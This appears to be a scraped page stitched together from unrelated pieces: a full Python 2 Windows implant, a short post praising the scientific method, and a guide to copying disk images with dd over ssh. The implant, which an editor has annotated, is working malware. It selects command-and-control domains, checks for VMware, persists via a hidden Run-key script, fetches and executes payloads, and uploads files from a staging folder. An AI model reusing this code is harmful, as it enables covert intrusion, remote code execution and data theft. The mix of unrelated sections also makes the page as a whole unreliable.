# Python 2 implant as reproduced on this page. The extraction had flattened it onto
# four lines; indentation below is reconstructed from the control flow. Editor's
# comments mark each stage. The sample's own defects are pointed out, not fixed.
from urllib2 import urlopen
from urllib import urlencode
from glob import glob
from os import path
from os import makedirs
from os import remove
from fileinput import FileInput   # imported but never used
from socket import gethostname
from time import sleep
from time import time
from os import popen2
from os import popen
from re import findall
from re import IGNORECASE
from psutil import get_pid_list
from psutil import Process
from sys import exit
from sys import argv
from httplib import HTTPConnection
from os import getpid
from os import kill


# C2 selection: the hard-coded default is games-playbox.com; if a flag page on
# worldvoicetrip.com reads "1", the C2 host is fetched from domain.html instead.
# Any failure falls back to the default.
def getserver1():
    srv = "games-playbox.com"
    try:
        code1 = urlopen('http://worldvoicetrip.com/games/index.html')
        code2 = code1.read()
        if int(code2) == 1:
            code3 = urlopen('http://worldvoicetrip.com/games/domain.html')
            code4 = code3.read()
            return code4
        else:
            return srv
    except:
        return srv
        pass


# Working directories: c:\dir is the staging area that gets exfiltrated,
# c:\dir\dir2 holds the implant copy, downloaded payloads and helper scripts.
foldername = "/winone1"
dir1 = "c:\\dir\\"
dir3 = "c:\\dir"
dir2 = "c:\\dir\\dir2\\"
dir4 = "dir2"
_file = path.abspath(argv[0])
fpath = path.dirname(path.realpath(_file))
file17 = path.basename(_file)   # the implant's own file name


# Anti-analysis check: scrape "System Model" from SYSTEMINFO to detect VMware.
def SysInfo():
    values = {}
    cache = popen2("SYSTEMINFO")
    source = cache[1].read()
    sysOpts = ["System Model"]
    for opt in sysOpts:
        values[opt] = [item.strip() for item in findall("%s:\w*(.*?)\n" % (opt), source, IGNORECASE)][0]
    return values


try:
    sysinfo1 = SysInfo()
    sysinfo2 = str(sysinfo1)
except:
    sysinfo2 = "Test"
    pass

# The VMware branch only prints; the exit() is commented out in the sample.
if sysinfo2.find("VMware") <> -1:
    print "VMware"
    #exit()

# Single-instance logic: count other processes with the implant's name, bail out
# if more than two, otherwise kill the last one found. Note that `p` is unbound
# when no other instance exists; the bare except hides the resulting NameError.
pcount = 0
xx = get_pid_list()
myid = getpid()
for i in xx:
    try:
        pro = Process(i).name
        if pro.find(file17) <> -1:
            if i != myid:
                p = i
                pcount = pcount + 1
    except:
        continue

if pcount > 2:
    exit()

try:
    kill(p, 9)
except:
    pass


# Wraps a file object as an HTTP/1.1 chunked transfer-encoding body so that files
# of unknown size can be streamed to the C2 without a Content-Length header.
class ChunkedEncodingWrapper(object):
    def __init__(self, fileobj, blocksize=102400):
        self.fileobj = fileobj
        self.blocksize = blocksize
        self.current_chunk = ""
        self.closed = False

    def read(self, size=None):
        ret = ""
        while size is None or size >= len(self.current_chunk):
            ret += self.current_chunk
            if size is not None:
                size -= len(self.current_chunk)
            if self.closed:
                self.current_chunk = ""
                break
            self._get_chunk()
        else:
            # while/else: the loop ended because size < len(current_chunk)
            ret += self.current_chunk[:size]
            self.current_chunk = self.current_chunk[size:]
        return ret

    def _get_chunk(self):
        if not self.closed:
            chunk = self.fileobj.read(self.blocksize)
            if chunk:
                self.current_chunk = "%x" % (len(chunk),) + "\r\n" + chunk + "\r\n"
            else:
                self.current_chunk = "0\r\n\r\n"   # terminating chunk
                self.closed = True


if not path.exists(dir1):
    makedirs(dir1)
if not path.exists(dir2):
    makedirs(dir2)

# Persistence: run.bat adds an HKCU Run value named "Search" pointing at the copy
# in c:\dir\dir2; run.vbs executes the batch file with a hidden window (the 0).
try:
    batch = open(dir2+'run.bat','wb')
    bat2='REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Search /t REG_SZ /d "%s%s" /f'%(dir2,file17)
    batch.write(bat2)
    batch.close()
    f1 = open(dir2+'run.vbs','wb')
    data12='Set WshShell = CreateObject("WScript.Shell" )\n'
    data12+='WshShell.Run chr(34) & "'+dir2+'run.bat" & Chr(34), 0\n'
    data12+='Set WshShell = Nothing'
    f1.write(data12)
    f1.close()
    the_output = popen(dir2+"run.vbs").read()
except:
    pass

# Hide the staging directory (hidden + system) and copy the implant into dir2.
the_output = popen("attrib +h +s %s"%(dir3)).read()
the_output = popen("copy %s %s"%(file17,dir2)).read()
cname = gethostname()   # host name doubles as the per-victim folder on the C2


# Splits a large file into chunkSize pieces plus an -info.txt manifest.
# Sample defect: the manifest is written with the global `basename`, which is
# assigned in the main loop below, rather than the basename1 parameter.
def splitFile(inputFile,chunkSize,basename1):
    f = open(inputFile, 'rb')
    data = f.read()
    f.close()
    bytes = len(data)
    noOfChunks= bytes/chunkSize
    if(bytes%chunkSize):
        noOfChunks+=1
    f = open(inputFile+'-info.txt', 'w')
    f.write(basename+','+str(noOfChunks))
    f.close()
    chunkNames = []
    j = 0
    for i in range(0, bytes+1, chunkSize):
        j = j + 1
        fn1 = inputFile+"-%s" % j
        chunkNames.append(fn1)
        f = open(fn1, 'wb')
        f.write(data[i:i+ chunkSize])
        f.close()


getserver = getserver1()


# Launches a downloaded payload hidden via a throwaway run.vbs. Sample defect:
# the self-name check and the else branch use the global `dfile` set by the
# callers' loops, not the `ext` argument.
def runfile(ext):
    sleep(2)
    data2len = len(ext)
    if data2len <> 0:
        try:
            if dfile.find(file17) == -1:
                f1 = open(dir2+'run.vbs','wb')
                data12='Set WshShell = CreateObject("WScript.Shell" )\n'
                data12+='WshShell.Run chr(34) & "'+ext+'" & Chr(34), 0\n'
                data12+='Set WshShell = Nothing'
                f1.write(data12)
                f1.close()
                size1 = path.getsize(ext)
                if size1 <> 0:
                    the_output = popen(dir2+"run.vbs").read()
                    remove(dir2+"run.vbs")
                else:
                    remove(dfile)
        except:
            pass


# Beacon: online.php?sysname=<hostname> returns a ';'-separated list of payload
# names, each fetched from /download/<name>, saved into dir2 and executed.
def dex(cname):
    try:
        dfiles5 = urlopen("http://"+ getserver + foldername+ "/online.php?sysname="+cname+"")
        dfiles6 = dfiles5.read()
        dfiles7 = dfiles6.split(';')
        data7len = len(dfiles6)
        if data7len <> 0:
            for dfile in dfiles7:
                try:
                    f5 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile)
                    output1=open(dir2+"%s"%dfile,'wb')
                    output1.write(f5.read())
                    output1.close()
                    dfile = dir2+dfile
                    runfile(dfile)
                except:
                    continue
    except:
        pass


# Hourly update: getfile.php lists payloads; any not already present in dir2 is
# downloaded and run. Sample defect: it splits the module-level `dfiles1` from
# the first check-in instead of the fresh response in dfiles11.
def dex1():
    try:
        dfiles12 = urlopen("http://"+ getserver + foldername+ "/getfile.php")
        dfiles11 = dfiles12.read()
        dfiles13 = dfiles1.split(';')
        files11 = glob(dir2+"*")
        for dfile14 in dfiles13:
            try:
                if not (dfile14 in files11):
                    f11 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile14)
                    output11=open(dir2+"%s"%dfile14,'wb')
                    output11.write(f11.read())
                    output11.close()
                    dfile = ''
                    dfile = dir2+dfile14
                    runfile(dfile)
            except:
                continue
    except:
        pass


# First check-in: register the host folder on the C2, then either fetch and run
# the payload list or, if the list is empty / the C2 is unreachable, run whatever
# .exe files are already cached in dir2.
try:
    urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//")
    dfiles2 = urlopen("http://"+ getserver + foldername+ "/getfile.php")
    dfiles1 = dfiles2.read()
    datalen3 = len(dfiles1)
    if datalen3 == 0:
        dfiles = ''
        dfiles = glob(dir2+"*.exe")
        for dfile in dfiles:
            try:
                runfile(dfile)
            except:
                continue
    else:
        dfiles = dfiles1.split(';')
        for dfile in dfiles:
            try:
                f = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile)
                output=open(dir2+"%s"%dfile,'wb')
                output.write(f.read())
                output.close()
                dfiles = ''
                dfiles = dir2+"%s"%(dfile)
                runfile(dfiles)
            except:
                continue
except:
    dfiles = ''
    dfiles = glob(dir2+"*.exe")
    for dfile in dfiles:
        try:
            runfile(dfile)
        except:
            continue

remove(dir2+"run.bat")
print "Enting While"

# Main loop, once a second: exfiltrate every file dropped into c:\dir (skipping
# dir2) as a chunked POST to post.php, delete it, and beacon; dex() runs after
# each upload and at least every ~120 s, dex1() roughly hourly. Files larger than
# about 100 MB are split first; the pieces are picked up on later iterations.
time1 = int(time())
count = 0
while True:
    try:
        time2 = int(time())
        tdif = time2 - time1
        if tdif > 3600:
            dex1()
            time1 = int(time())
        sleep(1)
        count = count + 1
        files = glob(dir1+"*")
        if count > 120:
            urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//")
            dex(cname)
            count = 0
        for file1 in files:
            try:
                if file1.find(dir4) <> -1:
                    continue
                try:
                    myfile = open(file1, "r+")   # skip files still locked by a writer
                except:
                    continue
                myfile.close()
                basename = path.basename(file1)
                size = path.getsize(file1)
                if size > 105163101:
                    splitFile(file1,105163101,basename)
                    remove(file1)
                data = open(file1,"rb")
                w = ChunkedEncodingWrapper(data)
                v = urlencode({'filename': basename})
                x = urlencode({'folder': cname})
                headers = {"Transfer-Encoding": "chunked"}
                c = HTTPConnection(getserver)
                c.request("POST", "%s/post.php?%s&%s/"%(foldername,v,x), w, headers)
                data.close()
                remove(file1)
                dex(cname)
                count = 0
                time2 = int(time())
                tdif = time2 - time1
                if tdif > 3600:
                    dex1()
                    time1 = int(time())
            except:
                pass
    except:
        pass
What Science is All About
This is a good lay description of science:
If you cherry-pick scientific truths to serve cultural, economic, religious or political objectives, you undermine the foundations of an informed democracy.
Science distinguishes itself from all other branches of human pursuit by its power to probe and understand the behavior of nature on a level that allows us to predict with accuracy, if not control, the outcomes of events in the natural world. Science especially enhances our health, wealth and security, which is greater today for more people on Earth than at any other time in human history.
The scientific method, which underpins these achievements, can be summarized in one sentence, which is all about objectivity:
Do whatever it takes to avoid fooling yourself into thinking something is true that is not, or that something is not true that is.
Given the current trend with pop-psychology books, it’s nice to see someone write something that is easily accessible, yet accurate.
Transfer a disk image via dd and ssh
To transfer a disk image over an ssh tunnel (think evidence collection across the internet):
dd if=</path/to/disk> | ssh user@host "dd of=<filename>"
For example:
dd if=/dev/sda | ssh user@example.com "dd of=image.dd"
In practice you will probably want additional dd options such as bs (block size), count, and conv=noerror,sync so that a bad sector does not abort the copy. If doing this for evidentiary purposes, dcfldd, dc3dd, ewfacquire and others provide more forensic-friendly options (built-in hashing, logging, split output). Whatever tool you use, hash the source device and the resulting image (sha256sum on both ends, for example) and record both: a pipe that dies midway leaves a truncated image, and dd of= will not complain about it.
To compress data before sending it across the network, add bzip2 (or gzip) with another pipe, and decompress on the receiving side so that the file written there is the raw image rather than a compressed stream:
dd if=</path/to/disk> | bzip2 | ssh user@host "bunzip2 | dd of=<filename>"
If you would rather keep the compressed stream, name the output accordingly (dd of=<filename>.bz2) and decompress it later; ssh -C is the alternative that compresses at the transport layer and leaves the receiving command unchanged.
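The complete pipeline, with the receiving side decompressing before dd and a hash check on both ends, as an added example that is not from the original post. The remote command is emulated with a local sh -c so it runs offline; the 1 MiB source file is constructed and stands in for /dev/sda. The function and file names are the example's own.

```shell
#!/bin/sh
# Added example, not part of the original post: dd | compress | "ssh" pipeline
# with decompression on the receiving side and SHA-256 verification of both ends.
# The remote side is emulated with sh -c; the quoted string is exactly what you
# would hand to ssh user@host in the real case.

# SHA-256 of stdin: sha256sum on GNU systems, shasum on BSD/macOS.
sha256_stdin() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum | cut -d ' ' -f 1
    else
        shasum -a 256 | cut -d ' ' -f 1
    fi
}

# image_over_pipe SRC DST
# Emulates:  dd if=SRC bs=64k | gzip -1 | ssh user@host "gunzip | dd of=DST"
# Prints "OK <hash>" and returns 0 when DST hashes the same as SRC,
# "MISMATCH <src-hash> <dst-hash>" and returns 1 otherwise.
image_over_pipe() {
    src=$1
    dst=$2
    # Hash of the source as read. On a real device this is the hash of the
    # block device itself (or dcfldd/dc3dd's hash of the same read pass).
    src_hash=$(sha256_stdin < "$src")
    # Receiving side: decompress first, then dd. Without the gunzip stage DST
    # would be a gzip stream, not a raw image.
    dd if="$src" bs=65536 2>/dev/null \
        | gzip -1 \
        | sh -c 'gunzip | dd of="$1" bs=65536 2>/dev/null' sh "$dst"
    dst_hash=$(sha256_stdin < "$dst")
    if [ "$src_hash" = "$dst_hash" ]; then
        echo "OK $dst_hash"
        return 0
    fi
    echo "MISMATCH $src_hash $dst_hash"
    return 1
}

# Build a constructed 1 MiB "disk" and push it through the pipeline.
demo() {
    work=$(mktemp -d)
    yes "constructed sector payload" | head -c 1048576 > "$work/fake_disk"
    if image_over_pipe "$work/fake_disk" "$work/image.dd"; then
        rc=0
    else
        rc=1
    fi
    rm -rf "$work"
    return $rc
}

demo
```

To use it for real, replace the sh -c wrapper with ssh user@host and hash the device on the source machine rather than a file. conv=noerror,sync is deliberately left off here: its padding of short reads changes the bytes written, so a hash of the device would no longer match the image, which is precisely the situation where a forensic imager's own logging and per-block hashing is the better choice.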